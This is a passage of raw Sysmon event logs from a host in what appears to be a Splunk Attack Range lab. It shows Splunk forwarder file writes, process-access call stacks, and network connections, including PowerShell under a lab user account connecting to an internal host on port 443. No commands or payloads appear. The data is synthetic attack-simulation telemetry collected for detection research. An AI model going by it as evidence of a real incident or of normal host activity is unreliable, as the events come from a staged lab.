Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=66ADAFFA063B31E5F69D627AC484518C,SHA256=F5D47327D33D42703C5378C4FD68E9677327C9A291C947140690B74AC0CFAC88,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498555Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:25.035{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=006893D891D6C69CE5E23C27349FC068,SHA256=D511DE683493FD78CF2AD4EF8E4516E6F265CACD0ED44878DD8C8BEB6A9A2133,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498558Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:26.081{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F194371C8255687513674E570F1D42D,SHA256=EAE9F3D8E21BC28D9BD6F7234B18B499C34AA521AB7C4941E5401BB0480E6D06,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498559Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:27.113{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40AE9A82D9E13538C8254428F6B4ABF9,SHA256=935D578281C6D764427FEA9B1915200E7107D7BF9AD43BF6AA019B4FB38D450F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498561Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:28.412{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=95BFF4C2EA51C39BEA661A7D1A546241,SHA256=9E3E1D4C3299FC08F16FFE1C477DC27720C4827ACCB72F464233BEE4225500A7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498560Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:28.147{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C532AE520F7B9B89AB058718DA12274,SHA256=6C8249848AB38AA3C42FE377A5D941167F83E653BD50F7B5C411687DC7B3BB34,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498564Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:59.853{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50659-false10.0.1.12-8000- 354300x800000000000000036498563Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:59.085{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50658-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498562Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:29.161{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED3BAB833DF735B66C310F9EF352084B,SHA256=1570122385B4E3E3C6947811C91F4D16529163E7D232C2756C4FC8198C895E07,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498565Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:30.176{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4249DBC028192C6E2E3F2EEB52395612,SHA256=2A0C3A634032897D6B66B89485CD431B5377861A42DAD270E23089F72CDB4192,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498566Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:31.209{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E29030D589E27B2FF27A55B942A904A,SHA256=0961E4328A6BA2BD245A97C26615383D1957B13C097DE771AD27B3AA7858B667,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498568Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:32.650{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498567Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:32.215{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48ACDD1211A4135B37A5A63B2632788A,SHA256=4E898875DD415D2B375364F5DF0C5CD2CEDBF79B346047BD2D11C1583AB2008E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498569Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:33.280{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38D29576A79A8BE77BEE48EBD4470FD7,SHA256=AD1CD94D9816BAF2BDF6A37FA88CED159A01380C48CBE67EFB140694E3F451FC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498573Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:04.855{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50661-false10.0.1.12-8000- 354300x800000000000000036498572Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:04.324{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50660-false10.0.1.12-8089- 23542300x800000000000000036498571Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:34.414{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=5673E99ADA2DCABD06FC2B7B354D4CC5,SHA256=457A38AF56354C1C1357F4ABDF0CA24BBE00F92E27BBA561EE8C68A2022FD599,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498570Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:34.295{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D35E82CCE05BEC8818C22973CEBCA10,SHA256=865AE864972F3BF1DB8C3AA1DD7B33539B290D88B99BC66E62F3F76D79D952B7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498575Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:05.086{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50662-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498574Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:35.311{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E28C4BF40CCE8E7BD455AFD0D1E20E4,SHA256=B95ECDEA7E46E3AC87D5BF1AA945A63FE2785A9A99DDED0825FBEAA4854036E6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498576Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:36.329{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D272658CF6479737953B4F52C4F6215C,SHA256=96ECAD19B9B49B7B0C3301A1E0C14CCC190BF394034BB1E188EC257D5563F566,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498586Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:37.959{B81B27B7-A21D-6140-B056-04000000C801}41804660C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498585Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:37.812{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A21D-6140-B056-04000000C801}4180C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498584Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:37.812{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498583Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:37.812{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498582Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:37.812{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498581Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:37.812{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498580Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:37.812{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A21D-6140-B056-04000000C801}4180C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498579Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:37.812{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A21D-6140-B056-04000000C801}4180C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498578Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:37.807{B81B27B7-A21D-6140-B056-04000000C801}4180C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036498577Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:37.344{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4B07EDCEF5A08EB87A8A8DDB9E6A5BC,SHA256=67749BE513CDFC33340627FC1AA3828B63F7798D29B26CC1396248B33900358F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498598Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:38.826{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=852398A99F0FC61E000326EADFFD88AB,SHA256=3F2A07ECA2461AACD9CEA1C9072E8A474B5B34C9C6D7B4283A285DCE0C0F43FE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498597Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:38.826{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2D8FB8FA30E18168A973E8C2C68CE70B,SHA256=FE1FCFE0DA669C614E8ACA9352FFDAB9C9DDDB60DBB3CFD9381567A083C48B12,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498596Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:38.689{B81B27B7-A21E-6140-B156-04000000C801}4404728C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498595Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:38.511{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A21E-6140-B156-04000000C801}4404C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498594Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:38.511{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498593Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:38.511{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498592Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:38.511{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498591Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:38.511{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498590Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:38.511{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A21E-6140-B156-04000000C801}4404C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498589Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:38.511{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A21E-6140-B156-04000000C801}4404C:\Program 